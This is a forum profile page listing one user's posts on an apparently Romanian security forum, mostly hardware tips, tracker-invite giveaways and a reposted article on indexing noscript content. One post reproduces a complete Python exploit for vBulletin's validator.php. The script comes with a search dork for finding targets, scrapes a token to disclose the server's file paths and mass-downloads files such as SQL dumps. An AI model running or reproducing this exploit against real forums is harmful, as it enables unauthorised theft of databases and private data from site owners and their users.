Jump to content

Aripipevant

Active Members
  • Posts

    561
  • Joined

  • Last visited

  • Days Won

    4

Everything posted by Aripipevant

  1. C). 60% deoarece probabilitatea e maxima avand in vedere ca raspunsul poate fi aleatoriu, adica: oricare l-as alege este corect dat fiind faptul ca nu este specificat in solutie. Am ales 60% deoarece are procentul cel mai mare, dar in contrariu (logica mea) poate fi A, B, C sau D, indiferent de procente.
  2. De ce nu mergi pe AMD c? sunt mai ieftine ?i e echivalentul lui intel, crezi c? dac? scrie i7 face minuni?
  3. Pân? în 4000 de lei î?i po?i lua un "Avion", eu personal dintr-un buget de 2000 lei mi-am f?cut un sistem: AMD Athlon X4 740 Quad Core 3.20GHz pe x64, 4GB Ram si un Asus GTX 650 si pot s?-?i spun c? nu m-a dezam?git în gaming, programe, encodare BluRay ?.a.m.d. Diferen?a este c? eu am desktop iar tu vrei un laptop, ia-?i un ASUS tati! s? fii ?ic, chiar î?i recomand un ASUS pentru c? având bugetul ?la o s?-?i permi?i, iar a?tep?rile nu î?i vor fi dezam?gite.
  4. @Viral-One, xxxMicutzu, ady_adam Invita?ii trimise!
  5. We all know how important is to make your content indexable by search engines. However, we also know that design of a website is as important as its content and fancy design usually requires lots of JavaScript. As search engines have difficulties with indexation of JavaScript, it’s possible that search engines won’t be able to see every piece of your content if you use lots of JavaScript. Is there any workaround? Usage of <noscript> tag is a common practice in web development. As <noscript> tag is rendered only on browsers with JavaScript disabled, developers use it to provide alternate content for users with JavaScript disabled. However, I was wondering if content of <noscript> tag is indexed by Google, so I decided to do a test. As my test showed that Google index content within <noscript> tags and another test showed that Bing and Yahoo! index <noscript> tag, I came up with a idea to use <noscript> tag to make JavaScript based content indexable. Important note Due to abusement of <noscript> tags by spammers, Google won’t give any value to links contained in <noscript> tag. So, please make sure that important content of your website is not JavaScript based. Also keep in mind that if you need to use <noscript> tags extensively, you’re probably doing something wrong. How to use <noscript> tag I believe readers of this blog are already familiar with some web development basics, so I’ll give you one simple example. <script type="text/javascript"> document.write("Your content") </script> <noscript>Your content</noscript> You should add your content enclosed with <noscript> tags right after your JavaScript code. This example is very simple, but generally, within <noscript> tag you should use content that is generated by JavaScript code. If you do something like that, both users and Google will see your content. Why you should or shouldn’t use <noscript> tags Obviously, one of the reasons to use <noscript> tag is to make JavaScript based content indexable. However, this is not the only benefit you’ll get when using it. <noscript> tag will also provide a better user experience for users without JavaScript (believe me or not, there are users that still search online with JavaScript disabled). There are some drawbacks too. Implementing both JavaScript based content and <noscript> alternatives requires more time, effort and money for development. Another problem is that adding additional tags to a page, results in an increase of a page size. Increase of page size will negatively affect its speed and if we consider that website speed is a ranking factor, we realize that we have to be careful. Luckily, size increase shouldn’t be big enough to noticeably affect speed. Please don’t spam! Spammers often use <noscript> tag because huge majority of users won’t see its content, but Google will. However, Google will fight against spam. If they catch you, you’ll get penalized. Please use this trick just to make content that is visible to users also visible to Google, not to fool Google to rank you higher or any other spammy action. Note: The opinions expressed in this article are the views of the author, and not necessarily the views of Caphyon, its staff, or its partners. Sursa: How to Make JavaScript Indexable by Google
  6. @LordZ32, k1dz0rr Invita?ii trimise.
  7. M?, un singur lucru doresc s? v? întreb: De ce to?i visa?i s? fi?i hackeri? - Bun? redactare autor!
  8. @Sdicky, razvan3u, vizarudanflorin, sandel2013, h2ojust, Spriteee, Alyn, ZORRO3484, r0mulus. Invita?iile au fost trimise tuturor.
  9. Aripipevant

    [SS] Muzica

    IPB? IPBForumSkins for IP. Board v(3.1.4 - v3.4.3) - Eleven SKiNS FOR YOU!
  10. Cu putin de javascript si json + css il poti face complicat daca stii cum, o sa se poate copia dar nu la mintea cocosului.
  11. Râde?i m? de ceva real nu de glumele alea proaste în Englez?.
  12. @VaD_SuNeTe, Sdicky Invita?iile au fost trimise! @florin59, Cu placere! P.S. Mai am la dispozi?ie 6 invita?ii, v? a?tept cu cereri.
  13. Acum câteva zile vroiai p?reri ?i sugestii de ce s? te apuci, era vorba c? vrei s? te apuci de ceva serios ("m-a? apuca de C") dar se pare c? ?i-ai ratat dorin?a de a înv??a ceva serios, iar acum v?d c? vrei s? ne dai pe spate cu sumele tale fabuloase. Bravo, continu?, mergi din rau în mai r?u iar o lab? nu-?i stric?.
  14. Dea ... ! prostie cu gamble-urile astea, nimeni nu î?i fur? ce ai în cap (m? refer la pariuri), iar dac? e?ti de?tept ?i cu pu?in noroc joci la Las Vegas-urile astea care s-au deschis recent la care ai 80% ?anse s? prinzi jackpot de 1850 lei.
  15. @Tuxiqul, Invita?ie trimis?!
  16. @Cutter, CristianRoflmao, Coco93, mymind2urmind, Johnel, perezz, florin59 Invita?iile au fost trimise tuturor prin PM (Mesaj privat). Mult noroc!
  17. @mad93, MasterBoy invita?iile au fost trimise!
  18. Vreau s? ofer invita?ii gratuite pentru cei dornici, dispun de 23 de invita?ii pe acest tracker ?i vreau s? le împart cu voi pentru c? ?tiu cum e s? ai nevoie de o am?rât? de invita?ie. Sper ca to?i s? v? ?ine?i de treab? ?i s? nu-mi p?ta?i obrazul pe care îl am pe acest tracker, aici m? refer s? sta?i la seed. P.S. Pentru to?i cei care nu ?ti?i, Myxz este un tracker foarte bine v?zut în materie de seriale, filme, blu-ray etc. L?sa?i un reply mai jos iar eu am s? v? dau prin PM invita?ia, pe urm? pute?i s? confirma?i printr-o editare c? a?i primit invita?ia, numai bine!
  19. Mul?umesc! a?a tot s? mai fie ...
  20. Da este adev?rat ca a mai fost postat?, de astfel este o adevarat? necesitate pentru unii, scuzele mele creatorului.
  21. #! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # ################################################################ # # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by ******* | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(args[2].strip("/")) elif args[1] == "download": download_data(args[2]) except Exception as message: print("An error occurred: {}".format(message)) except: print("Unknown error.") else: print("Ready!") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with urllib.request.urlopen(hurl) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" source = source[source.index(word) + len(word):] value = source[:source.index("'")] print("[+]Obtaining paths...") hurl = url + "/validator.php?op={}".format(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find("<td>") if index != -1: lastk = line[index + 4:line.index("</td>")].strip(" ") index = line.find("<strong>") if index != -1: lastv = line[index + 8:line.index("</strong>")].strip(" ") if lastk != None and lastv != None: index = lastk.rfind(".") if index in (-1, 0): lastk = "[other] {}".format(lastk) else: lastk = "[{}] {}".format(lastk[index + 1:], lastk) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open("vBlogs.txt", "w") as fout: fout.write(url + "\n") keys = sorted(dictionary.keys()) for key in keys: fout.write("{} ({})\n".format(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") mthreads = 50 with open("vBlogs.txt", "r") as fin: url = fin.readline().strip("\n") if files.find("*") == -1: hurl = url + "/" + files.strip("/") Download(hurl).start() else: ext = files[files.rindex(".") + 1:] for line in fin: pieces = line.strip("\n").split(" ") if pieces[0].count(ext) == 1: upath = pieces[1] hurl = url + "/" + upath.strip("/") while threading.active_count() > mthreads: pass Download(hurl).start() while threading.active_count() > 1: pass class Download(threading.Thread): def __init__(self, url): threading.Thread.__init__(self) self.url = url def run(self): try: with urllib.request.urlopen(self.url) as usock: data = usock.read() uparser = urllib.parse.urlparse(usock.geturl()) pieces = uparser.path.split("/") fname = pieces[len(pieces) - 1] with open(fname, "wb") as fout: fout.write(data) except: pass if __name__ == "__main__": main() Sursa: https://securityoversight.net/forum/index.php?/topic/127-vbulletin-validatorphp-exploit/
  22. Arat? bine. Îmbog??e?te-?i site-ul cu material, f? afilieri prin 2parale.ro.
×
×
  • Create New...